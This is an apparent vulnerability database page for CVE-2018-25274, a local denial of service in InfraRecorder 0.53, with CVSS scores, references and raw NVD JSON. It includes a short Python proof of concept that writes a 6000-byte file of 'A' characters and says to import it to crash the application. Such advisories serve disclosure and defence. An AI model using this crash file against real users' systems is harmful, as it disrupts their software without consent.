CVE-2018-25274

Description

InfraRecorder 0.53 contains a denial of service vulnerability that allows local attackers to crash the application by importing a maliciously crafted text file. Attackers can create a text file containing 6000 bytes of data and import it through the Edit menu's Import function to trigger an application crash.

CVSS Details

CVSS Score

6.2

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

InfraRecorder 0.53

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Python script to generate a malicious file for InfraRecorder DoS
import os

# Define the payload size mentioned in the vulnerability description
payload_size = 6000

# Create a payload of 'A' characters (or any data)
payload = b'A' * payload_size

# Filename to save the malicious file
filename = "infrarecorder_dos.txt"

try:
    # Write the payload to a file
    with open(filename, "wb") as file:
        file.write(payload)
    print(f"[+] Malicious file '{filename}' created successfully with {payload_size} bytes.")
    print("[+] Import this file via InfraRecorder 'Edit' -> 'Import' to trigger the crash.")
except IOError as e:
    print(f"[-] Error creating file: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25274
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25274
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25274/
[4] VulDB https://vuldb.com/cve/CVE-2018-25274
[5] https://www.exploit-db.com/exploits/45413
[6] https://www.vulncheck.com/advisories/infrarecorder-denial-of-service-via-txt-file-import

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25274", "sourceIdentifier": "[email protected]", "published": "2026-04-26T22:17:27.780", "lastModified": "2026-04-27T18:55:32.883", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "InfraRecorder 0.53 contains a denial of service vulnerability that allows local attackers to crash the application by importing a maliciously crafted text file. Attackers can create a text file containing 6000 bytes of data and import it through the Edit menu's Import function to trigger an application crash."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/45413", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/infrarecorder-denial-of-service-via-txt-file-import", "source": "[email protected]"}]}}